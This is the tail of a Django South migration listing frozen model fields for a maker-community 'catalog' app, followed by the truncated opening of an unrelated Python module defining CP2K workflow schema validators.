'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.note': {
'Meta': {'ordering': "['order']", 'object_name': 'Note'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pending_approval': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.product': {
'Meta': {'object_name': 'Product'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identicalto': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makeys': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'partsused'", 'blank': 'True', 'to': "orm['catalog.Makey']"}),
'makeys_as_tools': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'tools_used'", 'blank': 'True', 'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'sku': ('django.db.models.fields.IntegerField', [], {}),
'space_as_tools': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'tools_in_space'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Space']"}),
'tutorials': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'products'", 'blank': 'True', 'to': "orm['catalog.Tutorial']"})
},
'catalog.productdescription': {
'Meta': {'object_name': 'ProductDescription'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productdescriptions'", 'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'blank': 'True'}),
'user_or_shop': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'catalog.productimage': {
'Meta': {'object_name': 'ProductImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productimages'", 'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.productreview': {
'Meta': {'object_name': 'ProductReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product_reviews'", 'to': "orm['catalog.Product']"}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.productshopurl': {
'Meta': {'object_name': 'ProductShopUrl'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productshopurls'", 'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'catalog.question': {
'Meta': {'object_name': 'Question'},
'accepted_answer': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'answer_of'", 'null': 'True', 'blank': 'True', 'to': "orm['catalog.Answer']"}),
'accepted_time': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'description': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'catalog.searchlog': {
'Meta': {'object_name': 'SearchLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.shop': {
'Meta': {'object_name': 'Shop'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'shopimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'catalog.shopreview': {
'Meta': {'object_name': 'ShopReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shop_reviews'", 'to': "orm['catalog.Shop']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.space': {
'Meta': {'object_name': 'Space'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_admins'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'date_of_founding': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'facebook': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'space_inventory'", 'symmetrical': 'False', 'through': "orm['catalog.Inventory']", 'to': "orm['catalog.Product']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'last_updated_external': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10', 'blank': 'True'}),
'logo': ('django.db.models.fields.URLField', [], {'max_length': '400', 'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10', 'blank': 'True'}),
'map_zoom_level': ('django.db.models.fields.IntegerField', [], {'default': '13'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_members'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'membership_fee': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'new_inventory': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'space_new_inventory'", 'symmetrical': 'False', 'through': "orm['catalog.NewInventory']", 'to': "orm['catalog.NewProduct']"}),
'new_members': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_new_members'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewUser']"}),
'new_tools': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_new_tools'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}),
'no_of_members': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'twitter': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'catalog.spacereview': {
'Meta': {'object_name': 'SpaceReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'space_reviews'", 'to': "orm['catalog.Space']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.textdocumentation': {
'Meta': {'object_name': 'TextDocumentation'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'body': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'text_documentations'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.TextField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.toindexstore': {
'Meta': {'object_name': 'ToIndexStore'},
'added_time': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'catalog.topmakeys': {
'Meta': {'object_name': 'TopMakeys'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.topproducts': {
'Meta': {'object_name': 'TopProducts'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.topshops': {
'Meta': {'object_name': 'TopShops'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"})
},
'catalog.toptutorials': {
'Meta': {'object_name': 'TopTutorials'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"})
},
'catalog.topusers': {
'Meta': {'object_name': 'TopUsers'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.tutorial': {
'Meta': {'object_name': 'Tutorial'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'tutorialimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.upfile': {
'Meta': {'object_name': 'UpFile'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'filetype': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'files'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.userflags': {
'Meta': {'object_name': 'UserFlags'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_maker_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'show_makey_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.userinteraction': {
'Meta': {'object_name': 'UserInteraction'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.IntegerField', [], {}),
'event_id': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'interactions'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.usernotification': {
'Meta': {'unique_together': "(('user', 'interaction'),)", 'object_name': 'UserNotification'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interaction': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.UserInteraction']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'aboutme': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'blog_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'college': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'facebook_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'following': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'followers'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.UserProfile']"}),
'github_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instructables_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'linkedin_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'Bangalore, India'", 'max_length': '255'}),
'membership': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'patent': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'profile_pic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'stackoverflow_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'twitter_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'yt_channel_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'})
},
'catalog.video': {
'Meta': {'object_name': 'Video'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'embed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'site': ('django.db.models.fields.IntegerField', [], {}),
'thumb_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.votemakey': {
'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'VoteMakey'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.voteproductreview': {
'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteProductReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductReview']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.voteshopreview': {
'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteShopReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ShopReview']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.votespacereview': {
'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteSpaceReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.SpaceReview']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.votetutorial': {
'Meta': {'unique_together': "(('user', 'tutorial'),)", 'object_name': 'VoteTutorial'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'taggit.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
u'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
}
}
# South: limit this migration to the 'catalog' application.
complete_apps = ['catalog']
| |
# Public API of this module: one Schema validator per supported workflow,
# plus the shared CP2K general-settings validator.
__all__ = [
    'schema_cp2k_general_settings', 'schema_derivative_couplings', 'schema_single_points',
    'schema_distribute_absorption_spectrum',
    'schema_distribute_derivative_couplings',
    'schema_distribute_single_points',
    'schema_absorption_spectrum']
from numbers import Real
from schema import (And, Optional, Or, Schema, Use)
import os
import pkg_resources as pkg
def merge(d1, d2):
    """
    Merge two dictionaries without modifying the originals.

    :param d1: base dictionary.
    :param d2: dictionary whose entries take precedence on key clashes.
    :returns: a new dict containing the union of ``d1`` and ``d2``.
